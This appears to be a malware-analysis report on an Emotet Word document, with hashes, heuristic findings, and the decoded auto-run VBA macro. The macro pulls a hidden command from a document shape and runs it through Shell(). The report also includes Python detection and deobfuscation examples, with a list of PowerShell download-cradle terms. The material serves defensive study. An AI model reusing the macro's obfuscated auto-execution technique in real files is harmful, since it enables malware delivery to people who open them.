Emotet — Office (OLE) malware analysis

Static analysis result for SHA-256 84a8b82276393a5a…

MALICIOUS

Office (OLE)

Size: 137.1 KB · Created: 2018-11-30 07:14:00 · Authoring application: Microsoft Office Word · First seen: 2019-01-11
MD5: 0c1e6808f6f89acf75895b752c67b878
SHA-1: d3a83165bac653f9ded554315e227f8b82fd1fe7
SHA-256: 84a8b82276393a5afffd2bfd144aac06882f6c45ac8fdc9a45c0f85d2a1a6e1c
Risk score: 272

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK
  • T1059.001 PowerShell
  • T1059.003 Windows Command Shell
  • T1204.002 Malicious File
  • T1566.001 Spearphishing Attachment

The sample contains a Document_Open VBA macro that calls Shell() to execute a command. The command string is not present in the macro source: the macro reads it from the text frame of a shape in the document body (Set sNLHV = Shapes("maIYbjEoE"), then IOBAT = sNLHV.TextFrame.ContainingRange) and passes it to Interaction.Shell() with window style 0 (vbHide), so the spawned console window is hidden. The Shell() call is buried as an element of an Array() constructor, and the few real statements are padded with blocks of junk assignments (Atn, Cos, CLng, CByte and CBool calls on random-looking identifiers) separated by repeated On Error Resume Next lines. The command string recovered from the document is a cmd.exe invocation with obfuscated arguments, which in turn calls PowerShell to download and execute a second-stage payload from a constructed URL. The ClamAV detection name 'Doc.Downloader.Emotet-6826427-0' attributes the file to the Emotet family.
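The process chain the summary describes (Word, then a hidden cmd.exe, then a PowerShell downloader) is what endpoint telemetry sees when the document is opened. The following Python is an added example, not part of this report and not the scanner's own logic: it walks constructed process-creation events (the field names pid, ppid, image and cmdline are assumptions standing in for Sysmon Event ID 1 or Windows 4688 fields) and flags shells whose ancestry includes an Office application, noting PowerShell cradle switches found in the command line.

```python
"""Office -> cmd.exe -> powershell.exe ancestry check (added example, not report code)."""

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Command-line fragments typical of a download cradle; checked case-insensitively.
CRADLE_TERMS = ("-enc", "-w hidden", "-windowstyle hidden", "downloadstring",
                "downloadfile", "invoke-webrequest", "iex", "new-object")


def _image_name(path):
    """Normalise an image path to its lower-case file name."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(events, pid):
    """Image names from pid up to the root, nearest first (cycle-safe)."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(_image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def find_office_shell_chains(events):
    """Return (pid, ancestry chain, cradle terms) for every cmd/PowerShell
    process that has an Office application somewhere above it."""
    hits = []
    for e in events:
        if _image_name(e["image"]) not in SHELL_IMAGES:
            continue
        chain = ancestry(events, e["pid"])
        if not any(img in OFFICE_IMAGES for img in chain[1:]):
            continue
        low = e.get("cmdline", "").lower()
        hits.append((e["pid"], chain, [t for t in CRADLE_TERMS if t in low]))
    return hits


# Constructed sample events (not real telemetry): a Word process opening an
# attachment, the macro's hidden cmd.exe, the PowerShell stage it launches,
# and an unrelated PowerShell run from the desktop that must not be flagged.
SAMPLE_EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 2040, "ppid": 100, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": '"WINWORD.EXE" /n invoice.doc'},
    {"pid": 3100, "ppid": 2040, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": 'cmd /V:ON /C "set xYz=...&&!xYz!"'},
    {"pid": 3144, "ppid": 3100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -enc SQBFAFgA..."},
    {"pid": 4000, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for pid, chain, terms in find_office_shell_chains(SAMPLE_EVENTS):
        print(pid, " <- ".join(chain), terms)
```

The ancestry walk, rather than a direct parent check, is what matters here: the PowerShell process is a grandchild of WINWORD.EXE, so a rule that only compares parent and child would see cmd.exe as the parent and miss the Office origin.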

Heuristics (9)

  • ClamAV: Doc.Downloader.Emotet-6826427-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-6826427-0
  • VBA macros detected medium (3 related findings) OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
       aoQoJnDwH = CByte(228743821)
       JvVRsF = Array(nzKcl, Interaction.Shell(IOBAT, iISLm), qurzup)
       On Error Resume Next
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    The compiled VBA (p-code) stream contains an auto-execution token together with shell, download or object-execution tokens. This check catches documents whose macro source has been stripped (p-code only) or could not be extracted, where no visible source is available. Here the source was extracted successfully (see macros.bas below), so this finding corroborates the source-level Shell and Document_Open findings rather than replacing them.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Attribute VB_Customizable = True
    Private Sub Document_open()
       On Error Resume Next
  • Suspicious cmd.exe invocation with execution flag high SC_STR_CMD
    Suspicious cmd.exe invocation with execution flag. The extracted macro source below contains no cmd.exe string, so this match comes from another part of the document, consistent with the macro reading its command line from a shape's TextFrame rather than embedding it in code.
  • Reference to PowerShell high SC_STR_POWERSHELL
    Reference to PowerShell
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body). This is the standard DrawingML XML namespace string written by Word for drawing objects; it is not a network indicator and should not be added to blocklists.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5072 bytes
SHA-256: 4493551c0199bef80f19a23599e55dba834c39ea62409585cdca58dcadaca0c9
Detection
ClamAV: No threats found (the Doc.Downloader.Emotet signature fired on the OLE container above, not on this decoded macro text)
Obfuscation or payload: likely
104 of 170 identifiers look randomly generated (e.g. 'VClVVbTKp') — consistent with name-mangling obfuscation.
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "XJPQrRGL"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   On Error Resume Next
            MQpKtLmI = Atn(wPIVk)
            iCpsLmmu = CLng(PaNUj)
            RGzdouN = Cos(wzlhwkG)
            tJnbSZX = CByte(CZViuTz)
            cjhILr = CByte(315494543)
            RdruaFoK = CBool(369406)
            hEhEIriY = OYiiizT
            RDzOB = 86969469
            JpidwzlLi = CByte(31591255)
   On Error Resume Next
            dGBBcFfU = Atn(mEBqZU)
            XRitdzvL = CLng(YcoXhjPJP)
            lEiFnjDMz = Cos(ifQBtUj)
            KCdLqDEc = CByte(wjFprbdik)
            MrJZnzkP = CByte(294997500)
            niMAfw = CBool(88312222)
            aOiBKs = frlqE
            SJjTsAcq = 88776753
            oLRDS = CByte(135083450)
Set sNLHV = Shapes("maIYbjEoE")
   On Error Resume Next
            ZhBMmw = Atn(sNOVcw)
            APThUkXL = CLng(vsbKaGKa)
            ilDAwa = Cos(VClVVbTKp)
            zcJqMnNzG = CByte(LmklDn)
            tKdAR = CByte(298939872)
            whmpOUZQ = CBool(137021799)
            IhQWWwqC = GkjSzShSZ
            MsjjY = 285057194
            AXimuuRC = CByte(193512846)
   On Error Resume Next
            uckuNSV = Atn(ciwTWazw)
            hJYcO = CLng(rFBbSAG)
            WNFDOrQaD = Cos(WGfnolpZ)
            ZPiAujBso = CByte(rCnWnZ)
            QXjFs = CByte(47941349)
            lFHvE = CBool(108827945)
            lsEhbs = LXMwbO
            kjksNj = 134718117
            qqjIYP = CByte(267378594)
   On Error Resume Next
            fOSBDw = Atn(AmHVotNti)
            QwNam = CLng(WbWKojA)
            ikCnkEzC = Cos(LSUSdH)
            SwhRCmCp = CByte(mvahmCTlY)
            DqZJdCOjB = CByte(55518223)
            JsTjrq = CBool(336556548)
            jriNuzJX = aIwjtmD
            tpDOoDAjb = 195003363
            GwvMU = CByte(12579616)
IOBAT = sNLHV.TextFrame.ContainingRange
   On Error Resume Next
            LBWiG = Atn(PTdTbKzw)
            ZVUwci = CLng(UCVDajSSU)
            LIEUaj = Cos(XYGRoUN)
            RzajQzC = CByte(QhUJDFj)
            LwLzo = CByte(302010647)
            zpuZEbifh = CBool(52932070)
            IlsmEQI = onGXWSrF
            qJNpY = 5881932
            qWawwmB = CByte(255403002)
   On Error Resume Next
            vLJsd = Atn(EjYDXZ)
            flPastKXA = CLng(tiVjXZ)
            oZEPw = Cos(nECkJq)
            OUIiTh = CByte(CVSDivs)
            JIcjGR = CByte(98682207)
            UfibbVpIA = CBool(218128220)
            DYarQqCET = BhBRX
            uIdjszWnz = 242537190
            ujfKD = CByte(10814977)
Const iISLm = 0
   On Error Resume Next
            dktiRLKA = Atn(nitWE)
            SRfYvmGbo = CLng(dzqHP)
            RDAZzQwY = Cos(IjGIV)
            RjutA = CByte(tiwWIFfo)
            UspFMq = CByte(146343652)
            wCTHRmG = CBool(1797411)
            TBMPwO = vYYDDr
            SkunoQ = 15708739
            JvEvr = CByte(220105209)
   On Error Resume Next
            pAjJEtY = Atn(XamKmYHt)
            skFtEQMNa = CLng(ItZsAohK)
            BGsnpvf = Cos(CzKqCwwbG)
            jljTvdJ = CByte(szilWF)
            ksoAzP = CByte(327571162)
            RKQPsGz = CBool(188958687)
            tQzZnh = OdZDhR
            bFdSEI = 178736987
            HmLSJ = CByte(203345184)
   On Error Resume Next
            EIkpvZjF = Atn(pIuWSkjYP)
            DkRRAW = CLng(qbnQSC)
            SbnsqPDP = Cos(jpvkzjTP)
            pTFvmq = CByte(TcjESfXF)
            Drzoh = CByte(340189237)
            nDicEl = CBool(146977532)
            IXzcj = WowHWnUL
            DRqctr = 143845262
            lqFRsEO = CByte(209106685)
   On Error Resume Next
            RYdMJ = Atn(VJsMCSREW)
            BOTIouI = CLng(aRCmHR)
            aKfKPEf = Cos(WANan)
            WDpCzK = CByte(lROXQNm)
            wiBanbHmu = CByte(45098320)
            VJwIaTU = CBool(36872171)
            NMjIH = otQnzrtLa
            MAAiOQ = 309373903
            aoQoJnDwH = CByte(228743821)
JvVRsF = Array(nzKcl, Interaction.Shell(IOBAT, iISLm), qurzup)
   On Error Resume Next
            mwmGamf = Atn(WTMZSzoAt)
            TtCJquKuF = CLng(ZPYAPs)
            jDjqF = Cos(TsVscCDM)
            OEdjZdF = CByte(wjjUZGvLK)
            rFwJBNF = CByte(225624211)
            VChrCz = CBool(329159305)
            TWjTd = MmKYUul
            hSdLGiE = 23995497
            arNkoP = CByte(270606979)
   On Error Resume Next
            iqTAa = Atn(cHKLhRiw)
            NzVumVwv = CLng(XruOaND)
            TYhCDXuH = Cos(KUnLarw)
            firfDijur = CByte(jtOhwHA)
            GRjKcbnQK = CByte(197059772)
            QwAvU = CBool(308011257)
            LAPqzILu = NHdYjK
            kjNVFQs = 252669301
            Gnajizt = CByte(253907358)
End Sub
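To see what the macro actually does underneath the filler, the Python below (an added example, not part of this report and not oletools code) strips the junk statements this generator pads the macro with, traces the Shell() arguments back to their definitions, and applies a simple random-identifier heuristic of the kind behind the "104 of 170 identifiers look randomly generated" note in the artifact entry above. The macro text it works on is a condensed copy of the preview above with most filler lines removed; the filler filter, the vowel and case-flip thresholds and the keyword list are assumptions tuned to this sample, not a general VBA deobfuscator.

```python
"""Triage of junk-padded Emotet-style VBA (added example, not report code)."""
import re

# Condensed copy of the macro preview above (most filler lines removed).
SAMPLE_VBA = '''Attribute VB_Name = "XJPQrRGL"
Attribute VB_Base = "1Normal.ThisDocument"
Private Sub Document_open()
   On Error Resume Next
            MQpKtLmI = Atn(wPIVk)
            iCpsLmmu = CLng(PaNUj)
            RGzdouN = Cos(wzlhwkG)
            tJnbSZX = CByte(CZViuTz)
            cjhILr = CByte(315494543)
            RdruaFoK = CBool(369406)
            hEhEIriY = OYiiizT
            RDzOB = 86969469
Set sNLHV = Shapes("maIYbjEoE")
   On Error Resume Next
            ilDAwa = Cos(VClVVbTKp)
IOBAT = sNLHV.TextFrame.ContainingRange
Const iISLm = 0
   On Error Resume Next
            aoQoJnDwH = CByte(228743821)
JvVRsF = Array(nzKcl, Interaction.Shell(IOBAT, iISLm), qurzup)
   On Error Resume Next
            Gnajizt = CByte(253907358)
End Sub
'''

# Filler this generator emits (assumption: sample-specific): a bare assignment
# whose right-hand side is a maths/conversion call, a number or another bare
# name, plus the error-suppression and module-attribute lines.
JUNK_RHS = re.compile(
    r"^\s*\w+\s*=\s*(?:(?:Atn|Cos|CLng|CByte|CBool)\(\s*\w+\s*\)|\d+|\w+)\s*$", re.I)
JUNK_LINES = re.compile(r"^\s*(?:On Error Resume Next|Attribute VB_\w+\s*=.*)$", re.I)
DEFINITION = re.compile(r"^(?:Set\s+|Const\s+)?(\w+)\s*=\s*(.+)$", re.I)
SHELL_CALL = re.compile(r"(?:Interaction\.)?Shell\s*\(\s*(\w+)\s*,\s*(\w+)\s*\)", re.I)
IDENT = re.compile(r"\b[A-Za-z_]\w*\b")
WINDOW_STYLE = {0: "vbHide", 1: "vbNormalFocus", 2: "vbMinimizedFocus",
                3: "vbMaximizedFocus", 4: "vbNormalNoFocus", 6: "vbMinimizedNoFocus"}
VBA_WORDS = {"attribute", "private", "sub", "end", "set", "const", "on", "error",
             "resume", "next", "array", "shapes", "textframe", "containingrange",
             "interaction", "shell", "atn", "cos", "clng", "cbyte", "cbool",
             "document_open"}


def skeleton(vba):
    """Drop filler and return the macro's remaining statements, stripped."""
    return [ln.strip() for ln in vba.splitlines()
            if ln.strip() and not JUNK_LINES.match(ln) and not JUNK_RHS.match(ln)]


def resolve_shell(lines):
    """Locate Shell(cmd, style) and trace both arguments to their definitions."""
    defs = {}
    for ln in lines:
        m = DEFINITION.match(ln)
        if m:
            defs[m.group(1)] = m.group(2).strip()
    for ln in lines:
        m = SHELL_CALL.search(ln)
        if not m:
            continue
        cmd_var, style_var = m.groups()
        cmd_src = defs.get(cmd_var, cmd_var)
        # One level of indirection: the command comes from an object set earlier.
        obj_src = defs.get(cmd_src.split(".", 1)[0], "")
        shape = re.search(r'Shapes\("([^"]*)"\)', obj_src)
        style_raw = defs.get(style_var, style_var)
        style = int(style_raw) if style_raw.isdigit() else None
        return {"command_var": cmd_var, "command_source": cmd_src,
                "shape_name": shape.group(1) if shape else None,
                "window_style": style,
                "window_style_name": WINDOW_STYLE.get(style, "unknown")}
    return None


def looks_random(name):
    """Name-mangling heuristic (an assumption, not the report's algorithm):
    vowel-poor names, or names whose letter case flips on most characters."""
    if len(name) < 5:
        return False
    vowels = sum(c in "aeiouyAEIOUY" for c in name) / len(name)
    flips = sum(a.isupper() != b.isupper() for a, b in zip(name, name[1:])
                if a.isalpha() and b.isalpha())
    return vowels < 0.2 or flips / (len(name) - 1) > 0.45


def identifier_stats(vba):
    """Return (distinct non-keyword identifier count, sorted names judged random)."""
    text = re.sub(r'"[^"]*"', '""', vba)  # ignore string literals
    names = {n for n in IDENT.findall(text)
             if n.lower() not in VBA_WORDS and not n.startswith("VB_")}
    return len(names), sorted(n for n in names if looks_random(n))


if __name__ == "__main__":
    real = skeleton(SAMPLE_VBA)
    print("\n".join(real), resolve_shell(real), sep="\n")
    total, random_names = identifier_stats(SAMPLE_VBA)
    print(f"{len(random_names)} of {total} identifiers look random")
```

The skeleton is six lines: open the sub, fetch the shape, read its text frame, define the window style, call Shell() inside an Array(), end. The command text itself still has to be pulled from the shape (olevba's --decode output or the document's shape text), which is why the static string findings above, not the macro source, are where the cmd.exe and PowerShell strings turn up.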